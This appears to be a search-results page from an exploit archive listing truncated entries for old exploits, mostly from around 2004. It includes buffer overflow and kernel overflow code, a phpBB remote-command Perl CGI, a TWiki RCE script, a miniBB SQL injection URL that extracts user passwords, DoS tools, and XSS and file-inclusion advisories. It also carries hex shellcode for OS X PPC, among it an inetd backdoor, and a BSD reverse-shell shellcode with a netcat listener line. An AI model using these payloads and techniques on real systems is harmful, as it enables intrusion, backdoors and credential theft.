3100 matches found
Ability Server 2.34 - 'APPE' Remote Buffer Overflow
/ TESTED ON WINXP SP0 RUS c by Dark Eagle from unl0ck research team http://unl0ck.void.ru HAPPY NEW YEAR! Greetz go out to: nekd0, antiq, fl0wsec setnf, nuTshell, nosystem CoKi, reflux... / include include include include // shellc0de by m00 team bind 61200 char shellcode=...
Linux Kernel 2.4.28/2.6.9 - 'ip_options_get' Local Overflow
/ int overflow in ipoptionsget Copyright Georgi Guninski Cannot be used in vulnerability databases like securityfocus and mitre / include include include include include include include include include include int mainint ac,char av struct msghdr msghdr; struct iovec iovector10; int i,s; struct...
OpenText FirstClass HTTP Daemon Search DoS
Binary data 2450.prm...
pntresmailer.txt
Hello All, PnTresMailer code browser 6.03 is open to information disclosure. Authors Site: http://canvas.anubix.net +-Examples:-----+ 1 www.victimsite.com/codebrowserpntm.php?foldertohighlight=pnTresMailer&fileto highlight=w00t Warning: highlightfilecodebrowserPnTM/pnTresMailer/w00t: failed to op...
phpBB 2.0.10 - Remote Command Execution (CGI)
!/usr/bin/perl wphpbb.cgi hack service: http://site/cgi-bin/wphpbb.cgi use CGI qw:standard; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-param"atak"; $serv = $CGI-param"serv"; $dir = $CGI-param"dir"; $topic = $CGI-param"topic"; $cmd = $CGI-param"cmd"; print...
IpbProArace 2.5.x SQL injection.
I have found an SQL injection in the popular ipbproarcade mod for ipb systems 1.x and 2.x. The vuln exists in the "category" field. By using this field it is possible to inject any SQL query and compromise the entire forum system. p.o.c for ipb 1.x...
TWiki 20030201 search.pm Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl "tweaky.pl" v. 1.0 beta 2 Proof of concept for TWiki vulnerability. Remote code execution Vuln discovered, researched and exploited by RoMaNSoFt roman rs-labs com Madrid, 30.Sep.2004. require LWP::UserAgent; use Getopt::Long; Default config $host ...
miniBB Input Validation Hole in 'user' Parameter
No description provided by source. Example: http://target/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,userpassword%20from%20minibbusers/ milw0rm.com 2004-11-16...
WinFTP Server 1.6 Denial of Service Exploit
Exploit for unknown platform in category dos / poc =========================================== WinFTP Server 1.6 Denial of Service Exploit =========================================== !/usr/local/bin/perl -w WinFTP server ver 1.6 D.o.S Exploit Discovered,exploited by KaGra Tested on WinXP SP1...
XXS in fusetalk forum
Vendor : fusetalk URL : http://www.fusetalk.com/ Version: 4.0 Risk : Cross site scripting Description: Fusetalk is a discussion forum solution that provides a powerful and simple method of web-based collaboration. Cross site scripting: The filtering script for the img src= doesn't filter " if...
blackboard.txt
Multiple vulnerabilities in BlackBoard AuThor:Cracklove emA!l:CrackloveatGmaildotCom HoMePaGe:http://ProxySky.com Info Website: http://blackboard.unclassified.de Version: 1.5.1,Maybe prior Problem: Full path disclosure,Include file Vuls 1.Full path disclosure: Let's try to request like this:...
Zanfi CMS Lite index.php inc Parameter Remote File Inclusion
The remote host is running Zanfi CMS Lite, a content management system written in PHP. There is a bug in the remote version of this software that may allow an attacker to execute arbitrary commands on the remote host by using a file inclusion bug in the file 'index.php'. An attacker may execute...
coldfusionmx61.txt
Software: Macromedia ColdFusion MX 6.1 Description: There is a vulnerability in the ColdFusion MX 6.1 product. To exploit this, a user needs access to create a cold fusion template on a ColdFusion server with CreateObject or cfobject tags enabled. The code given below writes a java class to the...
Kaspersky AntiVirus Window Caption GUI Bypass Vulnerability
I have discovered that the GUI part of KAV v5.0x kav.exe has a vulnerability that would allow any user to completely BYPASS the "password protection" in order to change settings or completely disable/exit KAV. There are dozens of shareware/freeware applications available on the internet that a us...
CFMX vulnerability
Software: Macromedia ColdFusion MX 6.1 Description: There is a vulnerability in the ColdFusion MX 6.1 product. To exploit this, a user needs access to create a cold fusion template on a ColdFusion server with CreateObject or cfobject tags enabled. The code given below writes a java class to the...
os-x/PPC create /tmp/suid 122 bytes
os-x/PPC create /tmp/suid 122 bytes. Shellcode exploit for osxppc platform / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does open; write; close; exit; See ASM below. 122 Bytes. / char shellcode = "\x7c\xa5\x2a\x79\x40\x82\xff\xfd" "\x7f\xe8\x02\xa6\x39\x1f\x01\x71" "\x39\x08\xfe\xf4\x7c\xa8\x29\xa...
os-x/PPC add inetd backdoor 222 bytes
No description provided by source. / PPC OS X / Darwin Shellcode by B-r00t. 2003. open; write; close; execve; exit; See ASM below. 222 Bytes! / char shellcode = "\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x48\x02\xa6\x3b\xea\x01\x70" "\x39\x60\x01\x70\x39\x1f\xff\x1b\x7c\xa8\x29\xae\x39\x1f\xff\x65"...
bsd/x86 reverse portbind 129 bytes
Exploit for bsd/x86 platform in category shellcode ================================== bsd/x86 reverse portbind 129 bytes ================================== / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on...
Google Toolbar HTML Injection
Binary data 2306.prm...
linux/x86 break chroot 34 bytes
Exploit for linux/x86 platform in category shellcode =============================== linux/x86 break chroot 34 bytes =============================== / The setuid0+chroot shellcode. It is the one of the smallest shellcodes in the !!world!! it will put '../' 10 times Size 34 bytes OS BSD...